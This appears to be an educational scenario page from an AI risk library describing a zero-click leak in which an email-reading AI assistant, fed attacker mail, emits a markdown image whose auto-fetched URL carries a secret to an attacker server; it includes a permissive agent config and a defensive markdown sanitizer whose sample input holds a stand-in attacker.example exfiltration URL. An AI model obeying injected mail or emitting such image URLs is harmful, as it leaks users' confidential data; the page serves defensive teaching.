πŸ”AI RiskAtlas
← Scenario library

Zero-Click Leak by Picture

An inbox summary quietly ships a secret to an attacker's server

Technique first revealed 29 Mar 2023

[Architecture diagram: Tool-Using Agent. Trust zones: Untrusted, Agent core, Oversight, The real world (goal scopes). Components: User, Orchestrator / Agent Loop, LLM, Identity & Permissions, Tool Runtime, Human Approval Gate, External APIs, Business Database, Untrusted Content, Audit Logging, Attacker email, Attacker server. Edge types: Instructions, Data, Actions, Control / decision, Feedback / logs.]
Setup (Step 1 / 6)

The assistant can read your mail

A company gives every employee an AI assistant that can read their email and documents so it can help draft replies and answer questions. That access is the whole point, and also the prize an attacker wants to reach.

βš™οΈAgent permission scopesconfig
agent_identity: copilot-user-delegate
scopes:
  - mail.read        # full inbox, incl. attacker-sent mail
  - files.read       # docs, incl. secrets in context
  - chat.compose     # may emit markdown to the client UI
output_render:
  markdown: enabled
  images: AUTO-FETCH        # <-- the channel that matters
  link_allowlist: (none)
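As an added defensive example (not part of the RiskAtlas scenario or its code), this Python filter enforces the `link_allowlist` that the config above leaves empty: it rewrites the assistant's markdown before the client renders it, replacing images from non-allowlisted hosts with plain text so nothing is auto-fetched, and de-linking non-allowlisted links. The host names, `sanitize_markdown` function and the sample output are constructed for illustration.

```python
import re
from urllib.parse import urlparse

# Markdown images ![alt](url) and links [text](url); an optional "title" after the URL is tolerated.
_IMG_RE = re.compile(r'!\[([^\]]*)\]\(([^)\s]+)(?:\s+"[^"]*")?\)')
_LINK_RE = re.compile(r'(?<!!)\[([^\]]*)\]\(([^)\s]+)(?:\s+"[^"]*")?\)')  # (?<!!) skips images


def _host_allowed(url: str, allowlist: frozenset[str]) -> bool:
    """True only for https URLs whose host is exactly on the allowlist (no subdomain wildcards)."""
    p = urlparse(url)
    return p.scheme == "https" and p.hostname is not None and p.hostname.lower() in allowlist


def sanitize_markdown(md: str, allowlist: frozenset[str]) -> tuple[str, list[str]]:
    """Return (safe_markdown, blocked_urls).

    Images pointing at non-allowlisted hosts become plain text, so the client never issues
    the fetch that would carry data off-box. Links to such hosts keep their text but lose
    the URL. blocked_urls is meant for the audit log, not for the user.
    """
    blocked: list[str] = []

    def img_sub(m: re.Match) -> str:
        alt, url = m.group(1), m.group(2)
        if _host_allowed(url, allowlist):
            return m.group(0)
        blocked.append(url)
        return f"[image removed: {alt or 'untrusted source'}]"

    def link_sub(m: re.Match) -> str:
        text, url = m.group(1), m.group(2)
        if _host_allowed(url, allowlist):
            return m.group(0)
        blocked.append(url)
        return text

    safe = _IMG_RE.sub(img_sub, md)      # images first, while they are still recognisable
    safe = _LINK_RE.sub(link_sub, safe)  # then plain links
    return safe, blocked


# Constructed example: one approved intranet host, and a sample assistant reply that mixes
# legitimate references with image/link URLs to a non-allowlisted host (no real payload).
ALLOWED_HOSTS = frozenset({"intranet.example.com"})
SAMPLE_OUTPUT = (
    "Here is your inbox summary.\n"
    "![logo](https://intranet.example.com/logo.png)\n"
    "![](https://attacker.example/i.png?q=CONSTRUCTED-VALUE)\n"
    "See [policy](https://intranet.example.com/policy) and [more](http://attacker.example/p)\n"
)

if __name__ == "__main__":
    rendered, audit = sanitize_markdown(SAMPLE_OUTPUT, ALLOWED_HOSTS)
    print(rendered)
    print("blocked for audit:", audit)
```

Run the filter on the orchestrator side, after the LLM produces its answer and before `chat.compose` hands markdown to the client, so the check does not depend on the model following instructions.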

AI RiskAtlas is an educational model of how GenAI & agentic systems work and fail. Architectures and payloads are illustrative and simplified for learning, not operational guidance. Real-world cases are summarised from public reporting.

Sources & further reading. Built by Shi Yuan.